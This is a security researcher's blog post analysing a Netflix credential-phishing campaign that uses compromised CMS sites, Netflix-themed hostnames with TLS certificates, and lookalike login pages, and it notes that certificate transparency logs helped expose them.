The attack starts with a compromised website. The phishing sites I have seen typically run "the usual" suspect CMS software like Wordpress or Drupal. I haven't had a chance yet to look at a compromised site that was used by this type of phishing attack, but I expect either an unpatched install or plugin or maybe just weak passwords. There is no indication that the attacks use anything "fancy". In some cases, attackers then also take advantage of wildcard DNS records for the domain. With a wildcard DNS record, *anything*.domain.com will point to the same IP address. The attacker will just use a subdomain/hostname to launch the attack. But I have also seen them use specific domain names registered for the phish.

Next, the attacker obtains a TLS certificate for a hostname or the domain used in the phish. The hostname label is typically Netflix related. For example netflix.domain.com or netflix.login.domain.com. The attacker will then use this hostname to trick users to visit the malicious site.

The e-mails that are used to trick the user are the weak part of this exploit in my opinion. For example, here is one that I received on Tuesday:

The e-mail was marked as spam, and the e-mail is not worded that well. In this case, the link went to hxxps://www. safenetflax .com , a domain registered just to impersonate Netflix. This domain no longer resolves.

Unlike the phishing e-mails, the websites look very much like the original. The only modification I can spot is that the alternative login methods like Facebook are missing. These methods would of course "spoil the phish." The attacker is interested in usernames and passwords.

The images below show the "real" and "fake" Netflix site:

Why do attackers go through the trouble? Netflix accounts are not particularly valuable. I have seen them offered from $0.20-0.50 per account, and the prices quoted on public visible sites are not always accurate. But on the other hand, this attack can be automated quite nicely. The exploits used to attack the hosting site is likely automated. Next, "certbot" and the ACME protocol makes it cheap and easy to get the TLS certificate.

I think the attacker actually made a mistake in using TLS. I found the sites pretty easily via certificate transparency logs, and I think Netflix, or someone else, is doing the same thing as I saw these sites often labeled as "deceptive" by Google's safe browsing feature, before the phishing part of the site was life. I doubt many users would notice if the site didn't use TLS.

Once a Netflix account is compromised, it can often be used for a long time undetected as Netflix allows multiple simultaneous streams for its standard and premium accounts. Unless the legitimate user gets "kicked off" for using too many streams, the legitimate user will never know that there is someone else using their account.

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
Twitter|